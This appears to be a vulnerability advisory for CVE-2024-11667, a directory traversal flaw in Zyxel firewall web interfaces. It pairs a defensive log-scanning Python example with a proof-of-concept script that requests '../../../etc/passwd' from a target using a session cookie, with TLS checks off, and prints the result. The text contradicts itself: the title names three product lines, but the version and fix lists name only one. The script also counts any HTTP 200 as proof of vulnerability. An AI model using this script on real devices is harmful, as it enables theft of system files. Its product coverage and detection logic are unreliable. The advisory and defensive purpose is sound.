CVE-2024-11667: Directory Traversal Vulnerability in Zyxel ATP, USG FLEX, and USG VPN Series Firmware

Summary: A critical directory traversal vulnerability (CVE-2024-11667) has been discovered in the web management interface of multiple Zyxel network security appliances. The vulnerability is present in:

USG20(W)-VPN series firmware versions V5.10 through V5.38

The vulnerability could allow an attacker to upload or download confidential files via a specially crafted URL.

Vulnerability Details: The affected web management interface fails to properly validate user-supplied input, allowing an attacker to navigate out of the intended directory and access sensitive information. This lets an attacker read or modify critical files, potentially compromising the security appliance and the network it protects.
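As an added illustration (not code from this advisory or from Zyxel's firmware) of the input validation the paragraph says is missing, the Python below confines a requested URL path to a fixed web root and reuses that same check to flag traversal attempts in access-log lines. WEB_ROOT, the common-log-format layout and the sample log lines are constructed assumptions.

```python
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed example: the directory the web interface is meant to serve from.
WEB_ROOT = "/var/www/html"


def resolve_under_root(request_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Return the normalized filesystem path for a URL path, or None if the
    request would escape ``root`` (directory traversal)."""
    path = request_path.split("?", 1)[0]        # drop any query string
    for _ in range(3):                          # bounded: also handles %252e double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")              # treat backslashes as separators
    # Join first, normalize second: ".." components are resolved against the
    # root, so an escape shows up as a path that lies outside it.
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def flag_traversal_requests(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, request_path) for each common-log-format line
    whose request would escape WEB_ROOT."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        try:
            _method, path, _version = line.split('"')[1].split()
        except (IndexError, ValueError):
            continue                            # malformed line, skip it
        if resolve_under_root(path) is None:
            hits.append((number, path))
    return hits


# Constructed sample log lines (not real traffic): one benign request, two traversal attempts.
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Nov/2024:10:15:04 +0000] "GET /css/../index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [27/Nov/2024:10:15:05 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 1833',
    '198.51.100.7 - - [27/Nov/2024:10:15:06 +0000] "GET /%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, path in flag_traversal_requests(SAMPLE_LOG):
        print(f"line {number}: traversal attempt {path!r}")
```

A request such as /css/../index.html stays inside the root and is allowed, while the plain and percent-encoded ../../../etc/passwd forms from the exploit section are rejected and reported.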

Exploit

An attacker can exploit this vulnerability by utilizing a crafted URL that points to files or directories outside the accepted boundaries of the web interface. Here's a code snippet showing how this can be accomplished:

import requests

# Replace the following values with the relevant target info
target_url = "https://TARGET-IP:TARGET-PORT/"
session_cookie = "session=YOUR_SESSION_COOKIE"   # the request is made with an existing web session
target_file = "/etc/passwd"

# Traversal sequences appended to the base URL escape the web interface's directory
crafted_url = target_url + "../../.." + target_file
headers = {'Cookie': session_cookie}

# verify=False disables TLS certificate validation (appliances commonly use self-signed certificates)
response = requests.get(crafted_url, headers=headers, verify=False)

if response.status_code == 200:
    print("Vulnerable (CVE-2024-11667):")
    print(response.text)
else:
    print("Not vulnerable or unable to verify vulnerability.")

This code uses Python's requests library to send an HTTP GET request with a crafted URL that contains directory traversal sequences (e.g., ../../..). If the target is vulnerable, the response will contain the contents of the /etc/passwd file.

Mitigation

To mitigate this vulnerability, Zyxel has released firmware updates for the affected products.

USG20(W)-VPN series: V5.39 or newer

The firmware updates can be downloaded from the official Zyxel website: Zyxel Firmware Updates

Additionally, restrict access to the web management interface to trusted networks and IP addresses.

References

1. CVE-2024-11667 - Official CVE Description
2. Zyxel Security Advisory
3. Zyxel Firmware Updates

*Disclaimer*: This information is provided for educational purposes and personal security only. Do not use it to engage in malicious activities or illegal conduct.

Timeline

Published on: 11/27/2024 10:15:04 UTC
Last modified on: 11/28/2024 03:15:14 UTC